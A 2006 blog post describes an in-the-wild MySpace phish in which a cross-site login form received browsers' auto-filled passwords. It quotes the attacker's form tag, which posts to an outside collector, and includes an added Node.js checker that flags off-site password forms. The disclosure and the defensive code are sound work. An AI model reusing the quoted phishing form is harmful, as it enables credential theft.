lowem.log
Inflation, Investing and Everything


20061127 Monday November 27, 2006

Cross-Site Forms + Password Manager = Security Failure

forums.mozillazine.org, forums.mozillazine.org -> bugzilla.mozilla.org :

I was shocked today to find an in-the-wild phish that uses nothing more than cross-site forms, and also extracts information from the Password Manager!

The underlying method was so obvious that it should have raised multiple warnings. There were none at all.

It was in a MySpace profile that included this tag:

<form name="2" action="http://membres.lycos.fr/adel88duran/plaguedoctor.php" method="post">

What followed was a nearly perfect-looking MySpace login form that used simple HTML and absolute positioning.

Not only did Firefox fail to raise a warning, it auto-filled my www.myspace.com username and password into this form!! I hope anyone reading this realizes it is a security failure for the browser to auto-fill the membres.lycos.fr form with credentials from another website ...

- As a browser security breach, this is too easy. Have to be very careful before submitting forms with auto-filled passwords. Seems to be a basic design issue that affects both IE and Firefox. Convenience vs security.

Kind of ignored this from a couple of weeks back until I went over to Mozillazine and read how the bug works. Really too easy. All you need is a website that allows people to edit HTML code. And for you to have a saved password on that site.
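The two ingredients named above, a site that lets users edit HTML plus a saved password for that site, are something the hosting site can screen for before it publishes user markup. What follows is an added example, not code from this post, from the Mozillazine thread or from Mozilla: a small Node.js check that pulls every form out of a block of submitted HTML, resolves its action against the hosting page URL the way a browser would, and flags any form that both carries a password field and submits to another host (or to a non-HTTP scheme). The function names, the hosting-page URL and the two extra forms in the sample markup are this example's own; only the lycos form tag is the one quoted in the post.

```javascript
// Added example (not from the original post or from Mozilla): pre-publish
// screening of user-supplied HTML for forms that would receive a password
// manager's auto-filled credentials and send them off-site. Regex-based on
// purpose so it runs without a DOM; a production sanitizer should use a real
// HTML parser. Function names and sample data are this example's own.

const PASSWORD_INPUT = /<input\b[^>]*\btype\s*=\s*["']?password/i;

// Pull every <form>...</form> out of a markup string and record its action,
// its method and whether the body contains a password field.
function extractForms(html) {
  const forms = [];
  const formRe = /<form\b([^>]*)>([\s\S]*?)<\/form>/gi;
  let m;
  while ((m = formRe.exec(html)) !== null) {
    const attrs = m[1];
    const body = m[2];
    const action = attrs.match(/\baction\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/i);
    const method = attrs.match(/\bmethod\s*=\s*["']?(\w+)/i);
    forms.push({
      action: action ? (action[1] || action[2] || action[3] || '') : '',
      method: method ? method[1].toLowerCase() : 'get',
      hasPasswordField: PASSWORD_INPUT.test(body),
    });
  }
  return forms;
}

// True when the action resolves to a different host than the page hosting the
// form, or to a non-HTTP scheme. Relative, empty and protocol-relative actions
// are resolved against the hosting page URL first, as a browser would do.
function submitsOffSite(action, hostingPageUrl) {
  const page = new URL(hostingPageUrl);
  let target;
  try {
    target = new URL(action, page);
  } catch (e) {
    return true; // unparseable action: treat as untrusted
  }
  if (target.protocol !== 'http:' && target.protocol !== 'https:') return true;
  return target.host.toLowerCase() !== page.host.toLowerCase();
}

// The forms a reviewer should refuse to publish: password field + off-site target.
function findCredentialLeakingForms(html, hostingPageUrl) {
  return extractForms(html).filter(
    f => f.hasPasswordField && submitsOffSite(f.action, hostingPageUrl)
  );
}

// Constructed sample: the form tag quoted in the post (given a plausible body),
// plus two forms that should NOT be flagged: a same-site login form, and an
// off-site form with no password field.
const SAMPLE_PROFILE_HTML = `
<form name="2" action="http://membres.lycos.fr/adel88duran/plaguedoctor.php" method="post">
  <input type="text" name="email"><input type="password" name="password">
  <input type="submit" value="Login">
</form>
<form action="/login" method="post"><input type="password" name="pw"></form>
<form action="//evil.example/poll" method="get"><input type="text" name="vote"></form>
`;

// Hypothetical hosting page URL (profile pages on the site described in the post).
const HOSTING_PAGE = 'http://www.myspace.com/someprofile';

for (const f of findCredentialLeakingForms(SAMPLE_PROFILE_HTML, HOSTING_PAGE)) {
  console.log(`REJECT: ${f.method.toUpperCase()} form with a password field posts to ${f.action}`);
}
```

Run with `node`, and only the lycos form is rejected; the same-site login form and the off-site poll form pass. Comparing full hosts is deliberately stricter than comparing registrable domains, so a form that posts to a sibling subdomain is also flagged for review. This is a server-side complement to the browser fix the post is waiting on, not a replacement for it: the browser still decides what to auto-fill.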

2 weeks now, and still awaiting a 2.0.x fix for Firefox. At least we know that the Firefox folks are working on it.

Update - to check if your browser is vulnerable to this exploit, you can try this demo page by Heise Security. From comment #66 in the bugzilla page.

(2006-11-27 16:44:53 SGT) [Tech] Permalink
